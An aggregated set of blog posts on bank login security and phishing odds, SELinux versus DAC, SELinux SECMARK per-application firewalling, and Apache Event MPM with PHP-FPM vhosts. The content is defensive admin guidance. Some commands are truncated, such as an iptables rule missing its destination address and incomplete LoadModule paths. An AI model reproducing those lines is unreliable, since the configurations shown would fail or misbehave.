As for the phishing this technique is supposed to prevent, I'm sceptical. The base idea is that a phishing form would only easily get three characters of the password, and it would then take incredible luck for the attacker to be asked exactly those three characters at login. I can find multiple ways to invalidate this precondition. Take the 5-digit PIN of AIB: the phishers only have to tell the user that they got one of the digits wrong and present a new challenge, asking for the two missing ones.
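For a sense of the odds involved (my own figuring, using the challenge sizes mentioned above), the chance that a fresh random challenge only asks positions the phisher already captured is a simple combinatorics exercise:

```python
from math import comb

def replay_odds(known: int, total: int, asked: int) -> float:
    """Probability that a random 'asked'-of-'total' challenge falls
    entirely within the 'known' positions a phisher already holds."""
    return comb(known, asked) / comb(total, asked)

# AIB: 3 captured digits of a 5-digit PIN, challenges ask for 3 digits
aib = replay_odds(3, 5, 3)      # 1/10 per login attempt
# Ulster Bank: 3 captured characters of a 20-character password
ulster = replay_odds(3, 20, 3)  # 1/1140 per login attempt
```

And a second phishing round collapses these odds entirely: once the attacker holds all five PIN digits, every challenge is answerable.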

But even more importantly, there are more sophisticated phishing attempts — say that you are going through a malevolent VPN or proxy: the attacker can implement a pass-through to your bank and still let you access all its functions — I've seen proofs of concept for similar sites, and heard colleagues in IT security talk about similar phishing attempts. In this case the attacker only needs to make sure not to close your session when you're done, and to take control of it just before the session gets interrupted by your bank. Most people wouldn't notice the added latency, and not everybody figures out something is wrong if the full name of the bank is missing from the location bar.

These requirements thus do nearly nothing to stop cybercriminals, but they weaken both password quality and password management: the worst of both worlds. My suggestion, based on both experience and the research brought forward by other groups and experts, is to let people set their own passwords, at least alphanumeric ones (allowing symbols is good, requiring them not so much), and to stop using PINs — phishing will happen anyway; make it harder for criminals to gain access to accounts by guessing 6- or 8-digit numeric passwords, which most likely end up being dates: the owner's date of birth, that of friends and family, or simply important dates in their life.

When I started this discussion I explicitly left KBC alone; the reason for this is that they don't use passwords, and instead rely on their mobile application for authentication — and this is going to be the next topic of discussion for all the banks. To login on the KBC online banking from your computer you need first to have the mobile app configured, and log into that one. Then you can use their one-time PIN generator to use for login, together with the user ID that the bank gave you.

It may sound at first like a good idea, but it requires you not to lose access to your mobile phone if you want to access your bank for any reason. The easy case is your phone crashing or breaking, so that you have to reset or replace it, in which case you just need to receive another SMS on the registered phone number to set up a new copy of the application (which does not help if you're travelling and the phone number is not actually available). Worse, if your phone gets stolen, you first have to wait for a new SIM to take control of the phone number before you can regain access to your bank account.

At this point I think it makes sense to point out that there are two "schools" in dealing with mobile banking applications: AIB, Ulster Bank, and Chase allow you to install many copies of the app on different devices, so you can always have one at hand set up to access your account. On the other hand, KBC and UniCredit only allow you to set up the application on one device, and if you need to install it on a different one you have to deauthorize the one already installed.

The best, in my opinion, mobile app is the one from Chase: you simply install it and then login with the same credentials as the online banking website. It'll ask you the password every time, but it does work fine with LastPass, and you can switch accounts as needed, which I find great.

All the other banks require setting up the application for one account only. I hope this is because they generate client-side secure credentials, but I'm too scared to actually figure out what the apps are doing. Nonetheless, it means that to set up the application you need access to the registered phone number. Luckily, none of them require reading the SMS out of the device store, which means you can use them on phone-like devices that can't receive SMS, or even on a device that is not configured for the given phone number.

This becomes important when you have bank accounts spanning different countries (four in my case, but only three need a local phone number); to solve this problem, I ended up buying a Nokia 130 featurephone which is dual-SIM, and allows me access to my 3 UK and Wind Italy phone numbers — if I had kept my number on 3 Italy I would have had a three-of-a-kind! This by the way works out fine unless I'm physically in the UK, as then the 3 UK can't connect, as the phone is not 3G.

While the app is tied to the device for most banks, what password you use with it varies quite a bit. As I said, Chase lets you log in with the same credentials as the online banking, which makes it the most sane solution. AIB also follows the same setting as the website, and allows you to log in with the same three out of five digits of the PIN. UniCredit, while forcing you to register your account number with the application at setup time, also uses the same PIN as the website (with no support for LastPass filling the form, but at least allowing you to paste the password copied from it).

Ulster Bank and KBC instead ignore your online banking password (or, in the case of KBC, there is none to begin with), and quite explicitly ask for a PIN (digits only) that is tied to the device itself. I would hope that this is actually used to encrypt the client-side certificate, but I'm not sure I want to verify my hopes.

The problem with mobile PINs is, once again, that it's one more separate piece of authentication to remember. And with the exception of Chase and UniCredit, as I pointed out, none of them allow you to use LastPass to store the PIN involved. The end result is that people either re-use another set of numbers, like their own birthdate or someone else's, or even re-use the device's PIN if there is one at all — and since figuring out a PIN from the oily pattern on the screen is far from impossible, you have just given up access to your bank account details.

Let me make something clear here: if you think that the people around you are all your friends, you're mistaken. I would love to live in the world you're thinking of, but I don't. There are bastards around you just as much as there are great people, and the people you list as "friends" on Facebook often are not. Not only is my birthday not a secret, neither is my sister's or my mother's or anyone else's. Facebook makes it easy to declare dates that are important to you — if something is an important date, never use it as your PIN! I guess I could write a post about the dangers of 8-digit PINs.
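A quick illustration of that danger (my own arithmetic, not from any bank's documentation): if an 8-digit PIN is actually a date in DDMMYYYY form, the effective keyspace collapses from 100 million combinations to the number of days in a plausible birthdate range.

```python
from datetime import date

# Days in a plausible birthdate range: 1940-01-01 up to (not including) 2010-01-01
date_pins = (date(2010, 1, 1) - date(1940, 1, 1)).days
all_pins = 10 ** 8

print(date_pins)               # 25568 possible date-PINs
print(all_pins // date_pins)   # ~3911 times smaller than the full keyspace
```

An attacker who guesses "it's a date" has cut the search space by more than three orders of magnitude before even looking at the victim's Facebook profile.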

I think this is going to be already quite the post, so I'll follow up with the rest of my musings on bank security in a separate post.

Sven Vermeulen a.k.a. swift (homepage, bugs)
Can SELinux substitute DAC? (August 09, 2015, 12:48 UTC)

A nice twitter discussion with Erling Hellenäs caught my full attention later when I was heading home: Can SELinux substitute DAC? I know it can't and doesn't in the current implementation, but why not and what would be needed?

SELinux is implemented through the Linux Security Modules (LSM) framework, which allows different security systems to be implemented and integrated in the Linux kernel. Through LSM, various security-sensitive operations can be secured further through additional access checks. This design was chosen to keep LSM as minimally invasive as possible.

The LSM design

The basic LSM design paper, Linux Security Modules: General Security Support for the Linux Kernel, presented in 2002, is still one of the better references for learning and understanding LSM. It shows that there was a wish from the community to have LSM hooks that could override DAC checks, and that this has been partially implemented through permissive hooks (not to be mistaken for SELinux' permissive mode).

However, this is definitely only partially implemented, because there are quite a few restrictions. One of them is that, if a request is made towards a resource and the UIDs match (see page 3, figure 2 of the paper), the LSM hook is not consulted at all; only when they don't match can a permissive LSM hook come into play. Support for permissive hooks is implemented for capabilities, a powerful DAC control that Linux supports and which is implemented through LSM as well. I have blogged about this nice feature a while ago.

These restrictions are also part of why some other security-conscious projects, such as grsecurity and RSBAC, do not use the LSM system. Well, it's not only because of these restrictions, of course - other reasons play a role as well. But knowing what LSM can (and cannot) do also shows what SELinux can and cannot do.

The LSM design itself is already a reason why SELinux cannot substitute DAC controls. But perhaps we could disable DAC completely and thus only rely on SELinux?

Disabling DAC in Linux would be an excessive workload

The discretionary access controls in the Linux kernel are not easy to remove. They are often part of the code itself (just grep through the source code for -EPERM). Some subsystems that use a common standard approach (such as VFS operations) can rely on well-integrated security controls, but these too often allow the operation if DAC allows it, and only consult the LSM hooks otherwise.

VFS operations are the most known ones, but DAC controls go beyond file access. It also entails reading program memory, sending signals to applications, accessing hardware and more. But let's focus on the easier controls (as in, easier to use examples for), such as sharing files between users, restricting access to personal documents and authorizing operations in applications based on the user id (for instance, the owner can modify while other users can only read the file).

We could "work around" the Linux DAC controls by running everything as a single user (the root user) and having all files and resources be fully accessible by this user. But the problem with that is that SELinux would not be able to take over controls either, because you will need some user-based access controls, and within SELinux this implies that a mapping is done from a user to a SELinux user. Also, access controls based on the user id would no longer work, and unless the application is made SELinux-aware it would lack any authorization system (or would need to implement it itself).

With DAC, Linux also provides quite some "freedom" that is well established in the Linux (and Unix) world: a simple security model in which user and group membership are validated against the owner, group and "rest" permissions. Note that SELinux does not really know what a "group" is. It knows SELinux users, roles, types and sensitivities.

So, suppose we would keep multi-user support in Linux but completely remove the DAC controls and rely solely on LSM (and SELinux). Is this something reusable?

Using SELinux for DAC-alike rules

Consider the use case of two users. One user wants another user to read a few of his files. With DAC controls, he can "open up" the necessary resources (files and directories) through extended access control lists so that the other user can access it. No need to involve administrators.

With a MAC(-only) system, updates on the MAC policy usually require the security administrator to write additional policy rules to allow something. With SELinux (and without DAC) it would require the users to be somewhat isolated from each other (otherwise the users can just access everything from each other), which SELinux can do through User Based Access Control, but the target resource itself should be labeled with a type that is not managed through the UBAC control. Which means that the users will need the privilege to change labels to this type (which is possible!), assuming such a type is already made available for them. Users can't create new types themselves.

UBAC is disabled by default in many distributions, because it has some nasty side-effects that need to be taken into consideration. Just recently one of these came up on the refpolicy mailing list. But even with UBAC enabled (I have it enabled on most of my systems, but then I only have a couple of users to manage and am the administrator on these systems, so I can quickly "update" rules when necessary), it does not provide functionality equal to DAC controls.

As mentioned before, SELinux does not know group membership. In order to create something group-like, we will probably need to consider roles. But in SELinux, roles are used to define what types are transitionable towards - it is not a membership approach. A type which is usable by two roles (for instance, the mozilla_t type which is allowed for staff_r and user_r) does not care about the role. This is unlike group membership.

Also, roles only focus on transitionable types (known as domains). It does not care about accessible resources (regular file types for instance). In order to allow one person to read a certain file type but not another, SELinux will need to control that one person can read this file through a particular domain while the other user can't. And given that domains are part of the SELinux policy, any situation that the policy has not thought about before will not be easily adaptable.

So, we can't do it?

Well, I'm pretty sure that a very extensive policy and set of rules can be made for SELinux which would make a number of DAC permissions obsolete, and that we could theoretically remove DAC from the Linux kernel.

End users would require extensive training to work with this system, and it would not be reusable across other systems in different environments, because the policy would be too specific to each system (unlike the current reference-policy-based ones, which are quite reusable across many distributions).

Furthermore, the effort to create these policies would be extremely high, whereas DAC permissions are very simple to implement and have proven to be well suited for many secured systems.

So no, unless you do massive engineering, I do not believe it is possible to substitute DAC with SELinux-only controls.

August 07, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Filtering network access per application (August 07, 2015, 01:49 UTC)

Iptables (and its successor, nftables) is a powerful packet filtering system in the Linux kernel, able to create advanced firewall capabilities. One feature that it cannot provide is per-application filtering. Together with SELinux, however, it is possible to implement this on a per-domain basis.

SELinux does not know applications, but it knows domains. If we ensure that each application runs in its own domain, then we can combine the firewall capabilities with SELinux to grant network access only to the domains that need it.

SELinux network control: packet types

The basic network control we need to enable is SELinux' packet types. Most default policies will grant application domains the right set of packet types:

~# sesearch -s mozilla_t -c packet -A
Found 13 semantic av rules:
   allow mozilla_t ipp_client_packet_t : packet { send recv } ; 
   allow mozilla_t soundd_client_packet_t : packet { send recv } ; 
   allow nsswitch_domain dns_client_packet_t : packet { send recv } ; 
   allow mozilla_t speech_client_packet_t : packet { send recv } ; 
   allow mozilla_t ftp_client_packet_t : packet { send recv } ; 
   allow mozilla_t http_client_packet_t : packet { send recv } ; 
   allow mozilla_t tor_client_packet_t : packet { send recv } ; 
   allow mozilla_t squid_client_packet_t : packet { send recv } ; 
   allow mozilla_t http_cache_client_packet_t : packet { send recv } ; 
 DT allow mozilla_t server_packet_type : packet recv ; [ mozilla_bind_all_unreserved_ports ]
 DT allow mozilla_t server_packet_type : packet send ; [ mozilla_bind_all_unreserved_ports ]
 DT allow nsswitch_domain ldap_client_packet_t : packet recv ; [ authlogin_nsswitch_use_ldap ]
 DT allow nsswitch_domain ldap_client_packet_t : packet send ; [ authlogin_nsswitch_use_ldap ]

As we can see, the mozilla_t domain is able to send and receive packets of type ipp_client_packet_t, soundd_client_packet_t, dns_client_packet_t, speech_client_packet_t, ftp_client_packet_t, http_client_packet_t, tor_client_packet_t, squid_client_packet_t and http_cache_client_packet_t. If the SELinux booleans mentioned at the end are enabled, additional packet types are allowed to be used as well.

But even with this default policy in place, SELinux is not being consulted for filtering. To accomplish this, iptables will need to be told to label the incoming and outgoing packets. This is the SECMARK functionality that I've blogged about earlier.

Enabling SECMARK filtering through iptables

To enable SECMARK filtering, we use the iptables command and tell it to label SSH incoming and outgoing packets as ssh_server_packet_t:

~# iptables -t mangle -A INPUT -m state --state ESTABLISHED,RELATED -j CONNSECMARK --restore
~# iptables -t mangle -A INPUT -p tcp --dport 22 -j SECMARK --selctx system_u:object_r:ssh_server_packet_t:s0
~# iptables -t mangle -A OUTPUT -m state --state ESTABLISHED,RELATED -j CONNSECMARK --restore
~# iptables -t mangle -A OUTPUT -p tcp --sport 22 -j SECMARK --selctx system_u:object_r:ssh_server_packet_t:s0

But be warned: the moment iptables starts with its SECMARK support, all packets will be labeled. Those that are not explicitly labeled through one of the above commands will be labeled with the unlabeled_t type, and most domains are not allowed any access to unlabeled_t.

There are two things we can do to improve this situation:

  1. Define the necessary SECMARK rules for all supported ports (which is something that secmarkgen does), and/or
  2. Allow unlabeled_t for all domains.

To allow the latter, we can load a SELinux rule like the following:

(allow domain unlabeled_t (packet (send recv)))

This will allow all domains to send and receive packets of the unlabeled_t type. Although this might be security-sensitive, it can be a good idea to allow it at first, together with proper auditing (you can use (auditallow ...) to audit all granted packet communication), so that the right set of packet types can be determined. This way, administrators can iteratively improve the SECMARK rules and finally remove the unlabeled_t privilege from the domain attribute.
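Combined, such a temporary policy module could look like this (a CIL sketch of my own, to be removed once the SECMARK rules are complete):

```
(allow domain unlabeled_t (packet (send recv)))
; log every granted access so the missing SECMARK rules become visible
(auditallow domain unlabeled_t (packet (send recv)))
```

The auditallow entries will show up in the audit log each time an unlabeled packet is granted, pointing at the ports that still need explicit SECMARK rules.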

To list the current SECMARK rules, list the firewall rules for the mangle table:

~# iptables -t mangle -nvL

Only granting one application network access

These two together allow for creating a firewall that only allows a single domain access to a particular target.

For instance, suppose that we only want the mozilla_t domain to connect to the company proxy. We can't enable the http_client_packet_t type for this connection, as all other web browsers and other HTTP-aware applications have policy rules enabled to send and receive that packet type. Instead, we are going to create a new packet type to use.

;; Definition of myhttp_client_packet_t
(type myhttp_client_packet_t)
(roletype object_r myhttp_client_packet_t)
(typeattributeset client_packet_type (myhttp_client_packet_t))
(typeattributeset packet_type (myhttp_client_packet_t))

;; Grant its use to mozilla_t
(typeattributeset cil_gen_require mozilla_t)
(allow mozilla_t myhttp_client_packet_t (packet (send recv)))

Putting the above in a myhttppacket.cil file and loading it allows the type to be used:

~# semodule -i myhttppacket.cil

Now, the myhttp_client_packet_t type can be used in iptables rules. Also, only the mozilla_t domain is allowed to send and receive these packets, effectively creating an application-based firewall, as all we now need to do is to mark the outgoing packets towards the proxy as myhttp_client_packet_t:

~# iptables -t mangle -A OUTPUT -p tcp --dport 80 -d -j SECMARK --selctx system_u:object_r:myhttp_client_packet_t:s0
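Keep in mind that these iptables rules only live in the running kernel; to survive a reboot they need to be persisted. On Gentoo with OpenRC, for instance (assuming the standard iptables service script is in use):

```
~# /etc/init.d/iptables save
```

Other distributions typically offer an equivalent via iptables-save and their own persistence mechanism.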

This shows that it is possible to create such firewall rules with SELinux. It is however not an out-of-the-box solution, requiring thought and development of both firewall rules and SELinux code constructions. Still, with some advanced scripting experience this will lead to a powerful addition to a hardened system.

Nathan Zachary a.k.a. nathanzachary (homepage, bugs)


My tech articles—especially Linux ones—are some of the most-viewed on The Z-Issue. If this one has helped you, please consider a small donation to The Parker Fund by using the top widget at the right. Thanks!

Recently, I’ve spent a huge amount of time working on Apache and PHP-FPM in order to allow for a threaded Apache MPM whilst still using PHP and virtual hosts (vhosts). As this article is going to be rather lengthy, I’m going to split it up into sections below. It’s my hope that after reading the article, you’ll be able to take advantage of Apache’s newer Event MPM and mod_proxy_fcgi in order to get the best performance out of your web server.

1. Definitions:

Before delving into the overarching problem, it might be best to have some definitions in place. If you’re new to the whole idea of web servers, programming languages used for web sites, and such, these definitions may help you become more acquainted with the problem that this article addresses. If you’re familiar with things like Apache, PHP, threading, preforking, and so on, feel free to skip this basic section.

  • Web server – on a physical server, the web server is an application that actually hands out (or serves) web pages to clients as they request them from their browser. Apache and nginx are two popular web servers in the Linux / UNIX world.
  • Apache MPM – a multi-processing module (or MPM) is the pluggable mechanism by which Apache binds to network ports on a server, processes incoming requests for web sites, and creates children to handle each request.
    • Prefork – the older Apache MPM that isn’t threaded, and deals with each request by creating a completely separate Apache process. It is needed for programming languages and libraries that don’t deal well with threading (like some PHP modules).
    • Event – a newer Apache MPM that is threaded, which allows Apache to handle more requests at a time by passing off some of the work to threads, so that the master process can work on other things.
  • Virtual host (vhost) – a method of deploying multiple websites on the same physical server via the same web server application. Basically, you could have two different sites on the same server, even using the same IP address.
  • PHP – PHP is arguably one of the most common programming languages used for website creation. Many web content management systems (like WordPress, Joomla!, and MediaWiki) are written in PHP.
  • mod_php – An Apache module for processing PHP. With this module, the PHP interpreter is essentially embedded within the Apache application. It is typically used with the Prefork MPM.
  • mod_proxy_fcgi – An Apache module that allows for passing off operations to a FastCGI processor (PHP can be interpreted this way via PHP-FPM).
  • PHP-FPM – Stands for PHP FastCGI Process Manager, and is exactly what it sounds like: a manager for PHP that’s being interpreted via FastCGI. Unlike mod_php, this means that PHP is being interpreted by FastCGI, and not directly within the Apache application.
  • UNIX socket – a mechanism that allows two processes within the same UNIX/Linux operating system to communicate with one another.

Defining threads versus processes in detail is beyond the scope of this article, but basically, a thread is much smaller and less resource-intense than a process. There are many benefits to using threads instead of full processes for smaller tasks.

2. Introduction:

Okay, so now that we have a few operational definitions in place, let’s get to the underlying problem that this article addresses. When running one or more busy websites on a server, it’s desirable to reduce the amount of processing power and memory needed to serve those sites. Doing so will, consequently, allow the sites to be served more efficiently, rapidly, and to more simultaneous clients. One great way to do that is to switch from the Prefork MPM to the newer Event MPM in Apache 2.4. However, that requires getting rid of mod_php and switching to a PHP-FPM backend proxied via mod_proxy_fcgi. All that sounds fine and dandy, except that there have been several problems with it in the past (such as .htaccess files not being honoured, effectively passing the processed PHP file back to Apache, and making the whole system work with virtual hosts [vhosts]). Later, I will show you a method that addresses these problems, but beforehand, it might help to see some diagrams that outline these two different MPMs and their respective connections to the PHP processor.

The de facto way to use PHP and Apache has been with the embedded PHP processor via mod_php:

Apache Prefork MPM with mod_php embedded
Apache with the Prefork MPM and embedded mod_php


This new method involves proxying the PHP processing to PHP-FPM:

Apache Event MPM to PHP-FPM via mod_proxy_fcgi
Apache with the Event MPM offloading to PHP-FPM via mod_proxy_fcgi

3. The Setup:

On the majority of my servers, I use Gentoo Linux, and as such, the exact file locations or methods for each task may be different on your server(s). Despite the distro-specific differences, though, the overall configuration should be mostly the same.

3a. OS and Linux kernel:

Before jumping into the package rebuilds needed to swap Apache to the Event MPM and to use PHP-FPM, a few OS/kernel-related items should be confirmed or modified: 1) epoll support, 2) the maximum number of open file descriptors, and 3) the number of backlogged sockets.

Epoll support
The Apache Event MPM and PHP-FPM can use several different event mechanisms, but on a Linux system, it is advisable to use epoll. Even though epoll has been the default since the 2.6 branch of the Linux kernel, you should still confirm that it is available on your system. That can be done with two commands (one for kernel support, and one for glibc support):

Kernel support for epoll (replace /usr/src/linux/.config with the actual location of your kernel config):
# grep -i epoll /usr/src/linux/.config

glibc support for epoll
# nm -D /lib/ | grep -i epoll
00000000000e7dc0 T epoll_create
00000000000e7df0 T epoll_create1
00000000000e7e20 T epoll_ctl
00000000000e7a40 T epoll_pwait
00000000000e7e50 T epoll_wait

Max open file descriptors
Another aspect you will need to tune based on your specific needs is the maximum number of open file descriptors. Basically, since there will be files opened for the Apache connections, the UNIX socket to PHP-FPM, and for the PHP-FPM processes themselves, it is a good idea to have a high maximum number of open files. You can check the current kernel-imposed limit by using the following command:

# cat /proc/sys/fs/file-max

Though that number is usually very high, you also need to check the per-user limits. For the sake of ease, and seeing as servers running many vhosts may frequently add and modify user accounts, I generally set the max file descriptors pretty high for *all* users.

# grep nofile /etc/security/limits.conf
# - nofile - max number of open file descriptors
* soft nofile 16384
* hard nofile 16384

The specifics of modifying the limits.conf file are outside of the scope of this article, but the above changes will set the soft and hard limits to 16,384 open files for any user on the system.
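After logging in again (limits.conf changes only apply to new sessions), a quick way to confirm the new limits took effect is to query the shell's own limits:

```shell
# soft and hard open-file limits for the current shell session
ulimit -Sn
ulimit -Hn
```

Both should report the values configured in limits.conf (16384 in the example above).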

Backlogged socket connections
The last OS configuration that you might want to initially configure is the maximum number of backlogged socket connections. This number is important because we will be proxying Apache to PHP-FPM via UNIX sockets, and this value sets the maximum number of connections per socket. It should be noted that this is the maximum number per socket, so setting this kernel parameter to some outlandish value doesn’t really make a lot of sense. As you will see later in this tutorial, I create a socket for each virtual host, so unless you plan on having more than 1024 simultaneous connections to PHP-FPM per site, this value is sufficient. You can change it permanently in /etc/sysctl.conf:

# grep somaxconn /etc/sysctl.conf
net.core.somaxconn = 1024

and remember to run sysctl -p thereafter in order to make the changes active.
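To double-check the running value afterwards (assuming procfs is mounted, as on any normal Linux system):

```shell
# the live maximum backlog per listening socket
cat /proc/sys/net/core/somaxconn
```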

3b. Package rebuilds:

Now that you’ve checked (and possibly modified) some OS-related configurations, a few packages need to be recompiled in order to change from the Apache Prefork MPM to the Event MPM and to use PHP-FPM. Here’s a list of the changes that I needed to make:

  • In /etc/portage/make.conf
    • Change the MPM to read APACHE2_MPMS="event"
    • Ensure you have at least the following APACHE2_MODULES enabled: cgid proxy proxy_fcgi
    • Per the mod_cgid documentation, you should enable mod_cgid and disable mod_cgi when using the Event MPM
  • In /etc/portage/package.use
    • Apache: www-servers/apache threads
    • PHP must include at least: dev-lang/php cgi fpm threads
      • Note that you do not need to have the ‘apache2′ USE flag enabled for PHP since you’re not using Apache’s PHP module
      • However, you will still need to have the MIME types and the DirectoryIndex directives set (see subsection 3d below)
    • Eselect for PHP must have: app-eselect/eselect-php fpm

Now that those changes have been made, and you’ve recompiled the appropriate packages (Apache, and PHP), it’s time to start configuring the packages before reloading them. In Gentoo, these changes won’t take effect until you restart the running instances. For me, that meant that I could compile everything ahead of time, and then make the configuration changes listed in the remaining 3.x subsections before restarting. That procedure allowed for very little downtime!

3c. Apache:

Within the configurations for the main Apache application, there are several changes that need to be made due to switching to a threaded version with the Event MPM. The first three bullet points for httpd.conf listed below relate to the proxy modules, and the fourth bullet point relates to the directives specific to the Event MPM. For more information about the MPM directives, see Apache’s documentation.

  • In /etc/apache2/httpd.conf
    • The proxy and proxy_fcgi modules need to be loaded:
      LoadModule proxy_module modules/
      LoadModule proxy_fcgi_module modules/
    • Comment out LoadModule cgi_module modules/ so it does not get loaded
    • Replace that with the one for mod_cgid: LoadModule cgid_module modules/
    • Update the MPM portion for Event:
      • <IfModule event.c>
        StartServers 2
        ServerLimit 16
        MinSpareThreads 75
        MaxSpareThreads 250
        ThreadsPerChild 25
        MaxRequestWorkers 400
        MaxConnectionsPerChild 10000
        </IfModule>
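A quick sanity check on those MPM numbers: ServerLimit × ThreadsPerChild bounds how many worker threads can ever exist, and MaxRequestWorkers must not exceed that product.

```shell
# 16 server processes x 25 threads each = 400 possible workers,
# which matches the MaxRequestWorkers value above
echo $(( 16 * 25 ))
```

If you raise MaxRequestWorkers, raise ServerLimit or ThreadsPerChild accordingly.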

You will also need to make sure that Apache loads certain modules at runtime. In Gentoo, that configuration is done in /etc/conf.d/apache, and needs to contain at least the two modules listed below (note that your configuration will likely have other modules loaded as well):

  • In /etc/conf.d/apache

3d. Apache PHP module:

The last change that needs to be made for Apache is to the configuration file for how it handles PHP processing (in Gentoo, this configuration is found in /etc/apache2/modules.d/70_mod_php5.conf). I would suggest making a backup of the existing file, and making changes to a copy so that it can be easily reverted, if necessary.

70_mod_php5.conf BEFORE changes
<IfDefine PHP5>
  <IfModule !mod_php5.c>
    LoadModule php5_module modules/
  </IfModule>

  <FilesMatch "\.(php|php5|phtml)$">
    SetHandler application/x-httpd-php
  </FilesMatch>
  <FilesMatch "\.phps$">
    SetHandler application/x-httpd-php-source
  </FilesMatch>

  DirectoryIndex index.php index.phtml
</IfDefine>

70_mod_php5.conf AFTER changes
<IfDefine PHP5>
  ## Define FilesMatch in each vhost
  <IfModule mod_mime.c>
    AddHandler application/x-httpd-php .php .php5 .phtml
    AddHandler application/x-httpd-php-source .phps
  </IfModule>

  DirectoryIndex index.php index.phtml
</IfDefine>

Basically, you’re getting rid of the LoadModule reference for mod_php and all the FilesMatch directives. Now, if you’re not using virtual hosts, you can put the FilesMatch and Proxy directives from the vhosts section (3e) below in your main PHP module configuration. That being said, the point of this article is to set up everything for use with vhosts, and as such, the module should look like the example immediately above.

As mentioned in section 3b above, the reason you still need the 70_mod_php5.conf at all is so that you can define the MIME types for PHP and the DirectoryIndex. If you would rather not have this file present (since you’re not really using mod_php), you can just place these directives (the AddHandler and DirectoryIndex ones) in your main Apache configuration—your choice.

3e. vhosts:

For each vhost, I would recommend creating a user and corresponding group. How you manage local users and groups on your server is beyond the scope of this document. For this example, though, we’re going to have two sites (very creative, I know 😎 ). To keep it simple, the corresponding users will be ‘site1′ and ‘site2′, respectively. For each site, you will have a separate vhost configuration (and again, how you manage your vhosts is beyond the scope of this document). Within each vhost, the big change that you need to make is to add the FilesMatch and Proxy directives. Here’s the generic template for the vhost configuration additions:

Generic template for vhost configs
<FilesMatch "\.php$">
  SetHandler "proxy:unix:///var/run/php-fpm/$pool.sock|fcgi://$pool/"
</FilesMatch>

<Proxy fcgi://$pool/ enablereuse=on max=10>
</Proxy>

In that template, you will replace $pool with the name of each PHP-FPM pool, which will be explained in the next subsection (3f). In my opinion, it is easiest to keep the name of the pool the same as the user assigned to each site, but you’re free to change those naming conventions so that they make sense to you. Based on the ‘site1′ / ‘site2′ example, the vhost configuration additions would be:

site1 vhost config
<FilesMatch "\.php$">
  SetHandler "proxy:unix:///var/run/php-fpm/site1.sock|fcgi://site1/"
</FilesMatch>

<Proxy fcgi://site1/ enablereuse=on max=10>
</Proxy>

site2 vhost config
<FilesMatch "\.php$">
  SetHandler "proxy:unix:///var/run/php-fpm/site2.sock|fcgi://site2/"
</FilesMatch>

<Proxy fcgi://site2/ enablereuse=on max=10>
</Proxy>

3f. PHP-FPM:

Since you re-compiled PHP with FPM support (in step 3b), you need to actually start the new process with /etc/init.d/php-fpm start and add it to the default runlevel so that it starts automatically when the server boots (note that this command varies based on your init system):

rc-update add php-fpm default (Gentoo with OpenRC)

Now it’s time to actually configure PHP-FPM via the php-fpm.conf file, which, in Gentoo, is located at /etc/php/fpm-php$VERSION/php-fpm.conf. There are two sections to this configuration file: 1) global directives, which apply to all PHP-FPM instances, and 2) pool directives, which can be changed for each pool (e.g. each vhost). For various non-mandatory options, please see the full list of PHP-FPM directives.

At the top of php-fpm.conf are the global directives, which are:

[global]
error_log = /var/log/php-fpm.log
events.mechanism = epoll
emergency_restart_threshold = 0

These directives should be fairly self-explanatory, but here’s a quick summary:

  • [global] – The intro block stating that the following directives are global and not pool-specific
  • error_log – The file to which PHP-FPM will log errors and other notices
  • events.mechanism – What should PHP-FPM use to process events (relates to the epoll portion in subsection 3a)
  • emergency_restart_threshold – How many PHP-FPM children must die improperly before it automatically restarts (0 means the threshold is disabled)

Thereafter are the pool directives, for which I follow this template, with one pool for each vhost:

[$USER]
listen = /var/run/php-fpm/$USER.sock
listen.owner = $USER
listen.group = apache
listen.mode = 0660
user = $USER
group = apache
pm = dynamic
pm.start_servers = 3
pm.max_children = 100
pm.min_spare_servers = 2
pm.max_spare_servers = 5
pm.max_requests = 10000
request_terminate_timeout = 300

It may look a bit intimidating at first, but only the $USER variable changes based on your vhosts and corresponding users. When the template is used for the ‘site1′ / ‘site2′ example, the pools look like:

[site1]
listen = /var/run/php-fpm/site1.sock
listen.owner = site1
listen.group = apache
listen.mode = 0660
user = site1
group = apache
pm = dynamic
pm.start_servers = 3
pm.max_children = 100
pm.min_spare_servers = 2
pm.max_spare_servers = 5
pm.max_requests = 10000
request_terminate_timeout = 300

[site2]
listen = /var/run/php-fpm/site2.sock
listen.owner = site2
listen.group = apache
listen.mode = 0660
user = site2
group = apache
pm = dynamic
pm.start_servers = 3
pm.max_children = 100
pm.min_spare_servers = 2
pm.max_spare_servers = 5
pm.max_requests = 10000
request_terminate_timeout = 300

Since the UNIX sockets are created in /var/run/php-fpm/, you need to make sure that that directory exists and is owned by root. The listen.owner and listen.group directives make the actual UNIX socket for the pool owned by $USER:apache, and listen.mode ensures that the apache group can write to it (which is necessary).
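If the directory does not exist yet, it can be created up front (root console; the path is the one used in the pool template):

```
~# mkdir -p /var/run/php-fpm
~# chown root:root /var/run/php-fpm
```

PHP-FPM will then create the per-pool sockets inside it with the ownership and mode set by the listen.* directives.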

The following directives are ones that you will want to change based on site traffic and server resources:

  • pm.start_servers – The number of PHP-FPM children that should be spawned automatically
  • pm.max_children – The maximum number of children allowed (connection limit)
  • pm.min_spare_servers – The minimum number of spare idle PHP-FPM servers to have available
  • pm.max_spare_servers – The maximum number of spare idle PHP-FPM servers to have available
  • pm.max_requests – Maximum number of requests each child should handle before re-spawning
  • request_terminate_timeout – Maximum amount of time to process a request (similar to max_execution_time in php.ini)

These directives should all be adjusted based on the needs of each site. For instance, a really busy site with many simultaneous PHP connections may need 3 servers, each with 100 children, whilst a low-traffic site may only need 1 server with 10 children. The thing to remember is that those children are only active whilst actually processing PHP, which could be a very short amount of time (possibly measured in milliseconds). Conversely, setting the numbers too high for the server to handle (in terms of available memory and processor) will result in poor performance when sites are under load. As with anything, tuning the pool requirements will take time and analysis to get right.
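One rough starting point for pm.max_children (my own rule of thumb, not an official PHP-FPM guideline): divide the memory you can dedicate to PHP by the typical footprint of one busy child.

```shell
# e.g. 2048 MiB reserved for PHP-FPM, ~64 MiB per busy child
budget_mb=2048
per_child_mb=64
echo $(( budget_mb / per_child_mb ))   # a starting point for pm.max_children
```

Measure the real per-child resident size of your workload (it varies wildly between sites) and adjust from there.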

Remember to reload (or restart) PHP-FPM after making any changes to its configuration (global or pool-based):

/etc/init.d/php-fpm reload

4. Verification:

After you have configured Apache, your vhosts, PHP, PHP-FPM, and the other components mentioned throughout this article, you will need to restart them all (just for the sake of cleanliness). To verify that things are as they should be, you can simply browse to one of the sites configured in your vhosts and make sure that it functions as intended. You can also verify some of the individual components with the following commands:

